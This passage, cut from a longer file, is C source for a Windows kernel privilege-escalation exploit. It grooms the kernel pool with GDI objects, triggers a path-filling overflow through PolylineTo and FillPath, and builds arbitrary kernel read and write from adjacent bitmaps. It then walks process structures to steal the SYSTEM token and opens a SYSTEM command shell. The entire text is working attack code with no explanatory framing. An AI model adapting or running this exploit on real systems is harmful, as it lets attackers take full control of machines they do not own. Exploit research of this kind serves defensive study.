 		CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
 	}
 	// Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated
 	for (int k = 0; k < 5000; k++) {
 		bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size  = 3c0
 		bitmaps[k] = bmp;
 	}
 	// Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60
 	for (int k = 0; k < 1700; k++) { //1500
 		AllocateClipBoard2(0x30);
 	}
 	// delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray.
 	for (int k = 2000; k < 4000; k++) {
 		DestroyAcceleratorTable(pAccels[k]);
 		DestroyAcceleratorTable(pAccels2[k]);
 	}
 }
 void SetAddress(BYTE* address) {
 	for (int i = 0; i < sizeof(address); i++) {
 		bits[0xdf0 + i] = address[i];
 	}
 	SetBitmapBits(hManager, 0x1000, bits);
 }
 void WriteToAddress(BYTE* data) {
 	SetBitmapBits(hWorker, sizeof(data), data);
 }
 LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
 	SetAddress((BYTE *)&src);
 	return GetBitmapBits(hWorker, len, dst);
 }
 // Get base of ntoskrnl.exe
 ULONG64 GetNTOsBase()
 {
 	ULONG64 Bases[0x1000];
 	DWORD needed = 0;
 	ULONG64 krnlbase = 0;
 	if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
 		krnlbase = Bases[0];
 	}
 	return krnlbase;
 }
 // Get EPROCESS for System process
 ULONG64 PsInitialSystemProcess()
 {
 	// load ntoskrnl.exe
 	ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
 	// get address of exported PsInitialSystemProcess variable
 	ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
 	FreeLibrary((HMODULE)ntos);
 	ULONG64 res = 0;
 	ULONG64 ntOsBase = GetNTOsBase();
 	// subtract addr from ntos to get PsInitialSystemProcess offset from base
 	if (ntOsBase) {
 		ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
 	}
 	return res;
 }
 // Get EPROCESS for current process
 ULONG64 PsGetCurrentProcess()
 {
 	ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
 	 // walk ActiveProcessLinks until we find our Pid
 	LIST_ENTRY ActiveProcessLinks;
 	ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
 	ULONG64 res = 0;
 	while (TRUE) {
 		ULONG64 UniqueProcessId = 0;
 		// adjust EPROCESS pointer for next entry
 		pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
 		// get pid
 		ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
 		// is this our pid?
 		if (GetCurrentProcessId() == UniqueProcessId) {
 			res = pEPROCESS;
 			break;
 		}
 		// get next entry
 		ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
 		// if next same as last, we reached the end
 		if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
 			break;
 	}
 	return res;
 }
 void main(int argc, char* argv[]) {
 	HDC hdc = GetDC(NULL);
 	HDC hMemDC = CreateCompatibleDC(hdc);
 	HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
 	HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
 	static POINT points[0x3fe01];
 	for (int l = 0; l < 0x3FE00; l++) {
 		points[l].x = 0x5a1f;
 		points[l].y = 0x5a1f;
 	}
 	points[2].y = 20;
 	points[0x3FE00].x = 0x4a1f;
 	points[0x3FE00].y = 0x6a1f;
 	if (!BeginPath(hMemDC)) {
 		fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
 	}	
 	for (int j = 0; j < 0x156; j++) {
 		if (j > 0x1F && points[2].y != 0x5a1f) {
 			points[2].y = 0x5a1f;
 		}
 		if (!PolylineTo(hMemDC, points, 0x3FE01)) {
 			fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
 		}
 	}
 	EndPath(hMemDC);
 	//Kernel Pool Fung=Shuei
 	fungshuei();
 	//getchar();
 	fprintf(stdout, "[+] Trigerring Exploit.\r\n");
 	if (!FillPath(hMemDC)) {
 			fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
 		}
 	printf("%s\r\n", "Done filling.");
 	HRESULT res;
 	VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 	if (!fake) {
 		fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
 	}
 	memset(fake, 0x1, 0x100);
 	bits = malloc(0x1000);
 	memset(bits, 0x42, 0x1000);
 	for (int k=0; k < 5000; k++) {
 		res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
 		if (res > 0x150) {
 			fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
 			hManager = bitmaps[k];
 			hWorker = bitmaps[k + 1];
 			// Get Gh05 header to fix overflown header.
 			static BYTE Gh04[0x9];
 			fprintf(stdout, "\r\nGh04 header:\r\n");
 			for (int i = 0; i < 0x10; i++){
 				Gh04[i] = bits[0x1d0 + i];
 				fprintf(stdout, "%02x", bits[0x1d0 + i]);
 			}
 			// Get Gh05 header to fix overflown header.
 			static BYTE Gh05[0x9];
 			fprintf(stdout, "\r\nGh05 header:\r\n");
 			for (int i = 0; i < 0x10; i++) {
 				Gh05[i] = bits[0xd90 + i];
 				fprintf(stdout, "%02x", bits[0xd90 + i]);
 			}
 			// Address of Overflown Gh04 object header
 			static BYTE addr1[0x7];
 			fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
 			for (int j = 0; j < 0x8; j++) {
 				addr1[j] = bits[0x210 + j];
 				fprintf(stdout, "%02x", bits[0x210 + j]);
 			}
 			//Get pvscan0 address of second Gh05 object
 			static BYTE* pvscan[0x07];
 			fprintf(stdout, "\r\nPvsca0:\r\n");
 			for (int i = 0; i < 0x8; i++) {
 				pvscan[i] = bits[0xdf0 + i];
 				fprintf(stdout, "%02x", bits[0xdf0 + i]);
 			}
 			// Calculate address to overflown Gh04 object header.
 			addr1[0x0] = 0;
 			int u = addr1[0x1];
 			u = u - 0x10;
 			addr1[1] = u;
 			//Fix overflown Gh04 object Header
 			SetAddress(addr1);
 			WriteToAddress(Gh04);
 			// Calculate address to overflown Gh05 object header.
 			addr1[0] = 0xc0;
 			int y = addr1[1];
 			y = y + 0xb;
 			addr1[1] = y;
 			//Fix overflown Gh05 object Header
 			SetAddress(addr1);
 			WriteToAddress(Gh05);
 			// get System EPROCESS
 			ULONG64 SystemEPROCESS = PsInitialSystemProcess();
 			//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
 			ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
 			//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
 			ULONG64 SystemToken = 0;
 			// read token from system process
 			ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
 			// write token to current process
 			ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
 			SetAddress((BYTE *)&CurProccessAddr);
 			WriteToAddress((BYTE *)&SystemToken);
 			// Done and done. We're System :)
 			system("cmd.exe");
 			break;
 		}
 		if (res == 0) {
 			fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
 		}
 	}
 	getchar();
 	//clean up
 	DeleteObject(bitobj);
 	DeleteObject(bitmap);
 	DeleteDC(hMemDC);
 	ReleaseDC(NULL, hdc);
 	VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
 	//free(points);
 }